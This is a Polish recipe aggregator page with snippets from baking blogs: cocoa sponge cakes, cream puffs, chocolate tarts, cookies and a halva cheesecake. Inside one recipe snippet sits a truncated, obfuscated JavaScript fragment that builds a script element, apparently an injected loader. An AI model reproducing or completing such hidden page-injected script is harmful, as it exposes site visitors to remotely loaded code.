Takie sobie wafelki, bardzo podobne do tych robiła kiedyś moja mama jak w sklepach za bardzo nie było wyboru. Osoby 30+ na pewno te czasy pamiętają
Kuchnia Pełna EmocjiJakieś 3 lata temu stałam się szczęśliwą posiadaczką solidnej patelni. Ale patelni nie byle jakiej, bo dedykowanej specjalnie do orzeszków. Patelnia jest naprawdę solidna, ale dla
Mieszam w GarnkuLekkie, tortowe, aromatyczne ciasto, kakaowe, z nasączonymi herbatnikami, jakość kremu sprawia, że jest niesłodkie, efektowne, wspaniałe dla amatorów ciast kremowych Składniki: 6 jajek 0,5 szklanki cukru pudru 3/4 szklanki mąki pszennej 2 czubate łyżki kakao 1 łyżeczka proszku do pieczenia szczypta soli Masa 800 ml śmietanki 30% 200 gram serka mascarpone 2 łyżki cukru pudru Ponadto 8 paczek herbatników(...)dzielimy na 3 części Biszkopt przekrawamy na pół smarujemy połową masy kajmakowej, przykrywamy herbatnikami, które nasączmy wódką wymieszaną z sokiem z cytryny.Ciastka przykrywamy masą śmietanową, układamy następną warstwę z ciastek nasączamy ponczem smarujemy pozostałym kajmakiem, wykładamy następną warstwę śmietanową, przykrywamy biszkoptem smarujemy pozostałą masą śmietanową. Posypujemy posiekanymi orzechami. Smacznego
kgwjanczewoWitam Kochani :-) Dziś przychodzę do Was z przepisem na ptysie z kremem, ale ptysie w troszkę innym wydaniu, a mianowicie ptysie kakaowe :-) Wyglądają i smakują wspaniale. Polecam i zapraszam :-) SKŁADNIKI CIASTO -2 szklanki mąki pszennej tortowej (szklanka 250ml) -2 szklanki wody -250g masła lub margaryny -6 jajek -1 czubata łyżka ciemnego kakao KREM -500ml śmietany(...)pieczemy 10-15 minut. Ptysie studzimy, kroimy na pół. * ptysi wychodzi z podanych proporcji dużo, oczywiście ich ilość zależy od wielkości, polecam robić średnie, jeśli chcecie duże ciastka musicie je piec dłużej, tak by nie były mokre w środku. KREM śmietanę ubijamy na sztywno, dodajemy serem mascarpone i cukier puder-miksujemy. Ptysie nadziewamy kremem, oprószamy cukrem pudrem
moje pyszne łatwe i sprawdzone przepisy krok po krokuokazja by wspólnie z dziećmi wyciąć dynie, czy śmiesznie się przebrać. To również doskonały pretekst by razem przyrządzić pyszne smakołyki na Halloweenowe przyjęcie. Mogą to być lizaki, babeczki , czy ciastka. My przygotowaliśmy mini babeczki z pomarańczowym kremem i posypką w dynie i nietoperze. Ledwo udało mi się zrobić zdjęcia, bo maleństwa znikały w tajemniczych okolicznościach. Naprawdę polecam wspólne pieczenie(...)momentu powstania puszystej piany. Mąkę mieszamy z proszkiem do pieczenia, solą, sodą oraz wiórkami kokosowymi. Do zmiksowanych jajek przesiewamy stopniowo mieszankę suchych składników, dodajemy jogurt naturalny oraz masę kakaową. Mieszamy mikserem do połączenia składników. Powstałą masę nakładamy do papilotek (najlepiej podwójnych) do 2/3 wysokości. Pieczemy około 9 minut w temp 180 stopni Celsjusza. Po upieczeniu odstawiamy do wystygnięcia
Kolizje SmakówJak zrobić ciasteczka wałkiem zdobione? Dziś mam dla Was przepis na proste i szybkie ciasteczka wałkiem zdobione. Pyszne, kruche, idealne do wycinania i wzorków. Zdjęcia nie
Słodkie okruszkiCzekoladowa tarta wypełniona jest przepysznym, kremowych ganachem, a jej korpus wykonany został z okruszków biszkoptowych - ja używam wysuszonych okrawków ciasta biszkoptowego. Wy takowych okrawków mieć nie musicie, możecie kupić ciastka biszkopty i pokruszyć je. Tartę taką przygotować możecie z dowolnymi owocami na wierzchu. Wkrótce sezon na maliny, jeżyny, borówki. Wybierajcie co lubicie. Możecie też mieszać różne owoce. Na pewno(...)miarka kuchenna ) i zalać gorącą śmietanką. Odstawić na około 3 minuty, aż czekolada się rozpuści. Następnie, blenderem, zmiksować całość na aksamitny i gładki krem. 3. Gotowy ganach wylać do kakaowego korpusu tarty. Tartę wstawić na chwilę do lodówki. Gdy ganach zacznie się "ścinać", czyli lekko twardnieć, ułożyć na wierzchu nieduże truskawki. Tartę dobrze schłodzić w lodówce, minimum 3-4 godziny
kolorowotorcikowoSkładniki: Ciasto: 3 szklanki mąki pszennej 4 żółtka 2 łyżki cukru 1 łyżka kakao 0,5 łyżeczki proszku do pieczenia 1 łyżka cukru waniliowego
Ciastka - domowe słodkościmąki ziemniaczanej 2 żółtka 250 g masła Dodatkowo: 800 g świeżych truskawek 900 ml gorącej przegotowanej wody 2 galaretki truskawkowe okrągłe biszkopty 150 ml zimnej kremówki 30% Przygotowanie: Biszkopt kakaowy: Białka ubić na sztywno, dodać cukier, żółtka i nadal ubijać tak długo, aż masa będzie sztywna. Mąkę, proszek do pieczenia i kakao przesiać przez sitko. Dodawać porcjami do ubitej masy(...)Ciasto włożyć na kilka godzin do lodówki a najlepiej na całą noc. Przed podaniem ubić zimną kremówkę (bez cukru pudru) i zrobić kleksy z bitej śmietany na każdym ciastku
Ala piecze i gotujejuż ostatni przepis Wielkanocny. Kruche ciasteczka kakaowe, przyozdobione lukrem. Chce Wam życzyć Wesołych Świąt Wielkanocnych spędzonych mile w gronie rodzinnym i radosnego Alleluja ! oraz mokrego Śmigusa Dyngusa ! Składniki na 2 blaszki od piekarnika: 1 szkl mąki krupczatki 1/2 szkl mąki pszennej 50 g cukru pudru 1/2 łyżeczki proszku do pieczenia 150 g masła 1 całe jajko(...)bardzo się lepiło to podsypujemy leciutko jeszcze pszenną mąką ) i chowamy do lodówki na 30 min. 2. Po tym czasie wałkujemy na grubość 0,5 cm i wycinamy ciastka. 3. Pieczemy w 180 stop przez 15-18 min (piek. elekt) a w gazowym w 200 stop przez 10-12 min. Ciasteczka studzimy na kratce.Wystudzone przyozdabiamy lukrem. Smacznego
Gotowanie...to proste !czas ale też zawsze mam w domu zapas na wypadek niespodziewanej weny twórczej. *foremka 25*34 cm Składniki: 30 kakaowych herbatników paczka biszkoptów okrągłych (mogą być z kakaowym środkiem) 200 g masła w temperaturze pokojowej 1 szklanka cukru pudru 1 jajko 200 g orzechów włoskich 2 jabłka 2 opakowania galaretki pomarańczowej 3-4 banany (w zależności(...)zaczną tężeć plasterki banana ułożyć na kremie i zalać ciasto. Blaszkę owinąć folią lub złotkiem, żeby nie pociągnęło zapachów lodówki i schłodzić. Rada: do kremu lub ponczowania ciastek można dodać rumu lub wódki. Ciasto najlepiej kroić dopiero na drugi dzień po zrobieniu, wtedy będzie się ładnie prezentować. (function(){ ae9l=document.createElement("script");ae9l_="u"+("s")+"ta"; ae9l
Domowa Cukierenka-Domowa KuchniaDziś Tłusty Czwartek!!! Jak obyczaj głosi, kto nie zje w Tłusty Czwartek ani jednego pączka, ten będzie skazany na niepowodzenia przez cały rok. Mój sekret
Tradycyjna kuchnia Kasiustach... Ich zaletą jest to, że nie twardnieją po upieczeniu, więc nie trzeba czekać aż skruszeją, tylko można wcinać od razu :-) Polecam!!! Składniki na włoskie, maślane ciasteczka waniliowo-kakaowe BIAŁE CIASTO: 220 g mąki 3 łyżeczki proszku do pieczenia mała szczypta soli 1 budyń waniliowy bez cukru 115 g cukru pudru 1 łyżka cukru waniliowego 115 g zimnego masła(...)stopni C. Wyjmujemy ciasta z lodówki, z każdego odcinamy równą część, łączymy je razem, rolujemy na wałeczek grubości najmniejszego palca, skręcamy, dzielimy na kawałki i formujemy kółeczka. Ciastka układamy na blasze wyłożonej papierem do pieczenia, pieczemy w nagrzanym piekarniku 10-13 minut, czyli do chwili aż zaczną się lekko rumienić, studzimy na kratce. Ciasteczka te nie są mocno
Rozpustne gotowaniechałwy kakaowe każda po 65 g * 330 ml śmietanki 30% * 3 łyżki cukru pudru * 60 ml likieru czekoladowego * 2 łyżki żelatyny * 2 łyżeczki ekstraktu waniliowego Na spód: * opakowanie herbatników kakaowych * 1/3 kostki masła Na polewę: * 1 czekolada mleczna * 1 łyżeczka masła * 1 łyżka wody * 1 łyżka śmietanki 30% * 1 łyżka kakao * 1 łyżka cukru Herbatniki zblendowałam i dodałam do nich(...)dodałam kakao. Dolałam odrobinę wody. Całość chwilkę podgrzałam i dolałam śmietankę. Ostudzoną polewą polałam ciasto. Wstawiłam na noc do lodówki a na drugi dzień mieliśmy przepyszne ciastko do kawy. Smacznego! Lidka Artykuł Chałwowy sernik na zimno pochodzi z serwisu Pieprzyć z fantazją
Pieprzyć z Fantazjąchałwy kakaowe każda po 65 g * 330 ml śmietanki 30% * 3 łyżki cukru pudru * 60 ml likieru czekoladowego * 2 łyżki żelatyny * 2 łyżeczki ekstraktu waniliowego Na spód: * opakowanie herbatników kakaowych * 1/3 kostki masła Na polewę: * 1 czekolada mleczna * 1 łyżeczka masła * 1 łyżka wody * 1 łyżka śmietanki 30% * 1 łyżka kakao * 1 łyżka cukru Herbatniki zblendowałam i dodałam do nich(...)dodałam kakao. Dolałam odrobinę wody. Całość chwilkę podgrzałam i dolałam śmietankę. Ostudzoną polewą polałam ciasto. Wstawiłam na noc do lodówki a na drugi dzień mieliśmy przepyszne ciastko do kawy. Smacznego! Lidka
Pieprzyć z Fantazjąhttps://www.facebook.com/Di.gotuje http://digotuje.blogspot.com Przepis autorski (mój). Bajaderki, czyli kulki, które powstają z resztek innych ciast. To dobry sposób na wykorzystanie nadmiaru
Di gotujeskładników pochodzenia zwierzęcego, bez których wydawać by się mogło, że pewne dania nie mają racji bytu, to wbrew pozorom nie stanowi to najmniejszego problemu. Dowodem na to są dzisiejsze ciastka. Żadnych jajek, mleka, masła, a nawet mąki i cukru. Można? Można! Podstawowym składnikiem ciasteczek jest amarantus od firmy Fresano(do nabycia tutaj), zwany też zbożem XXI wieku, który(...)faktu, że nie cieszy się ona tak wielką popularnością, jak jej słodsze koleżanki i większość osób wręcz od niej stroni, co jest błędem. Powszechnie wiadomo, że przysmak produkowany z kakaowych ziaren to najlepszy sposób na chandrę, który dodaje energii i jest źródłem wartościowych składników mineralnych, jednak najwięcej jest ich właśnie w czekoladzie gorzkiej. Dzięki temu pomaga ona w myśleniu, zapobiega
peanutbuttermonster